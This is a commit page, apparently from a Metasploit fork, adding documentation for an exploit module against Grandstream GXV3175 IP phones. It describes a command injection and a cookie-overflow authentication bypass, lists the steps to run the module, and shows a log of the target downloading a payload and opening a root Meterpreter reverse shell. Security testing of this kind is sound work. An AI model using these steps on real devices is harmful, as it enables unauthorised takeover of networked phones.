adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Grandstream GXV3175 'settimezone' Unauthenticated Command Execution

Browse Source
This commit is contained in:
Brendan Coles
2022-01-19 00:04:15 +00:00
parent 1d3a6d51ca
commit ee2feb1207
2 changed files with 161 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec.md
+53
View File
@@ -0,0 +1,53 @@
## Vulnerable Application
This module exploits a command injection vulnerability in Grandstream GXV3175
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.
A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.
This module was tested successfully on Grandstream GXV3175v2
hardware revision V2.6A with firmware version 1.0.1.19.
## Verification Steps
1. `msfconsole`
1. `use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec`
1. `set rhosts [IP]`
1. `set lhost [IP]`
1. `run`
1. You should get a session
## Options
## Scenarios
```
msf6 > use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
rhosts => 10.1.1.109
msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110
lhost => 10.1.1.110
msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 10.1.1.110:4444
[*] Using URL: http://0.0.0.0:8080/JF62dexHKN8b
[*] Local IP: http://10.1.1.110:8080/JF62dexHKN8b
[*] Client 10.1.1.109 (Wget/1.10.1) requested /JF62dexHKN8b
[*] Sending payload to 10.1.1.109 (Wget/1.10.1)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 1 opened (10.1.1.110:4444 -> 10.1.1.109:39371 ) at 2022-01-08 13:27:44 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 10.1.1.109
OS : (Linux 2.6.32_gxv3170v2)
Architecture : armv7l
BuildTuple : armv5l-linux-musleabi
Meterpreter : armle/linux
meterpreter >
```